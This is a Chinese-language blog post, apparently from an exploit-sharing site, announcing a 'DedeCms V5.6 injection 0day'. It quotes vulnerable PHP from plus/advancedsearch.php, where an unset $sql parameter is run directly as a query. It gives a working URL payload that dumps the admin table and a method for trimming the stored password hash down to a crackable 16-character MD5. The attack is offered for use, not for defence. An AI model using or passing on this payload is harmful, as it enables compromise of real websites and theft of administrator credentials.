DedeCms V5.6 注入 0day

2010, June 15, 11:58 AM. oday收藏
Submitted by admin

作者:俺是农村的
QQ:332876777


plus/advancedsearch.php
$sql 变量未初始化。导致鸡助注入。

if($mid == 0)  //必须绕过,By:俺是农村的。
{
        showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
        exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from #@__advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo))   //囧啊,绕过有难度,By:俺是农村的。
{
        showmsg('自定义搜索模型不存在','-1');   By:小翔
        exit();
}
$template = $searchinfo['template'] != '' ?  $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql))         //人品问题,成功绕过! QQ:332876777
{
        ..............
}
else
{
        $sql = urldecode($sql);
        $query = $sql;
}

$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);

................

$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);

.............

$dlist->Display();
大小: 20.81 K
尺寸: 500 x 195
浏览: 64 次
点击打开新窗口浏览全图大小: 12.92 K
尺寸: 500 x 115
浏览: 50 次
点击打开新窗口浏览全图

 

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。 By:邻居小男人

Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27592, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35214, 评论: 0)
dedecms默认的注册用户 (浏览: 12777, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13488, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16159, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37386, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 21922, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 10944, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10071, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 17888, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):